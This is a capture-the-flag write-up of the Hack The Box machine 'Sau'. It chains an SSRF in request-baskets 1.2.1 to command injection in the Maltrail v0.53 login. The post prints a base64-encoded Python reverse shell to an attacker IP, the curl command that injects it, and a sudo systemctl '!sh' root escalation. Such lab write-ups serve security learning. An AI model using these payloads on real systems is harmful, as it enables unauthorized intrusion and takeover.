remoteshell.zip
Posts Tags Categories
remoteshell.zip

Contents

HTB: Sau

 included in HTB CTF
    3 minutes 
/sau/featured-image.jpg

Easy HTB machine with a SSRF vulnerability that gives access to OS command injection in mailtrail.

Enumeration

Nmap port scan

port 22, and 55555 are open. Port 80 and 8338 are filtered.


DuxSec@hi$ nmap -sV -sS -p- -v -oN nmap_all_ports 10.10.11.224
Nmap scan report for 10.10.11.224
Host is up (0.032s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
80/tcp    filtered http
8338/tcp  filtered unknown
55555/tcp open     unknown

Port 80

Port 80 is not accessible.

Port 55555

It shows a website that is running request-basket version 1.2.1.

./first_look.png

A quick google for request basket 1.2.1 exploit shows a CVE for SSRF: https://gist.github.com/b33t1e/3079c10c88cad379fb166c389ce3b7b3 . Details can be read here .

Creating the basket

./basket123.png

Basket created

./basket123_created.png

Basket dashboard

./basked123_dashboard.png

Shell as Puma

Settings

In the top bar I can open the settings.

./settings_button.png

That brings up the following configuration settings, here the SSRF vulnerability can be abused by setting it to localhost (127.0.0.1) on port 80 (remember the nmap port scan showed port 80 filtered).

Make sure proxy response is ticked.

./settings.png

This will make the requests that are sent to http://10.10.11.224:55555/basket123 be forwarded to the internal http://127.0.0.1:80 url.

Mailtrail

Browsing to http://10.10.11.224:55555/basket123 shows the following page.
./mailtrail_initial.png
At the bottom of the page it shows that it is powered by mailtrail v0.53.

./mailtrail_powered.png

OS Command injection

Googling mailtrail v0.53 exploit, shows the following website that explains the OS command injection vulnerability in mailtrail v0.53.
https://huntr.dev/bounties/be3c5204-fbd9-448d-b97c-96a8d2941e87/ .

POC from huntr.dev

1
2

curl 'http://hostname:8338/login' \
  --data 'username=;`id > /tmp/bbq`'

This shows that we can execute commands after the username.

First I need to change the settings url to /login
./settings_login.png

Let’s try to get a reverse shell.

Crafting payload

Using payloadallthethings python reverse shell

1

python3 -c 'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.196",4242));subprocess.call(["/bin/sh","-i"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())'

I will base64 encode this payload so it can be transferred correctly.


DuxSec@hi$ cat reverse_shell.py | base64 -w 0          
cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoIjEwLjEwLjE0LjE5NiIsNDI0MikpO3N1YnByb2Nlc3MuY2FsbChbIi9iaW4vc2giLCItaSJdLHN0ZGluPXMuZmlsZW5vKCksc3Rkb3V0PXMuZmlsZW5vKCksc3RkZXJyPXMuZmlsZW5vKCkpJwo=

-w 0 = disable line wrapping

In order to execute this on the system, we need to decode it back to base64 and run it.

1

echo cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoIjEwLjEwLjE0LjE5NiIsNDI0MikpO3N1YnByb2Nlc3MuY2FsbChbIi9iaW4vc2giLCItaSJdLHN0ZGluPXMuZmlsZW5vKCksc3Rkb3V0PXMuZmlsZW5vKCksc3RkZXJyPXMuZmlsZW5vKCkpJwo=|base64 -d|bash

Now I need to insert that into the payload in curl.


DuxSec@hi$ curl 'http://10.10.11.224:55555/basket123' --data 'username=;`echo cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoIjEwLjEwLjE0LjE5NiIsNDI0MikpO3N1YnByb2Nlc3MuY2FsbChbIi9iaW4vc2giLCItaSJdLHN0ZGluPXMuZmlsZW5vKCksc3Rkb3V0PXMuZmlsZW5vKCksc3RkZXJyPXMuZmlsZW5vKCkpJwo=|base64 -d|bash`'

I start my nc listeren and run the curl command, and recieve a shell as puma.


DuxSec@hi$ nc -lnvp 4242
listening on [any] 4242 ...
connect to [10.10.14.196] from (UNKNOWN) [10.10.11.224] 50712
/bin/sh: 0: can't access tty; job control turned off
$ whoami
puma

User flag


$ cd ~
$ ls
linpeas.sh
user.txt
$ cat user.txt
6277461a7719f********

Privilege escalation

Running sudo -l shows that the current user is allowed to run /usr/bin/systemctl status trail.service as sudo.


$ sudo -l
Matching Defaults entries for puma on sau:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User puma may run the following commands on sau:
    (ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service

A quick GTFO bins search shows how I can escalate my privileges GTFObins systemctl .

For the privilege escalation, a interactive shell is required, if you don’t know how to do this; (Read this )[https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/]

Root flag

Running sudo systemctl status trail.service followed by !sh gives me a root shell.


puma@sau:/opt/maltrail$ sudo systemctl status trail.service
sudo systemctl status trail.service
WARNING: terminal is not fully functional
-  (press RETURN)!sh
!sshh!sh
# whoami
whoami
root
# cat /root/root.txt
cat /root/root.txt
f3f250***********
Updated on 07 Jan 2024
Read Markdown
 HTBHTBHTBHTBHTB
Back | Home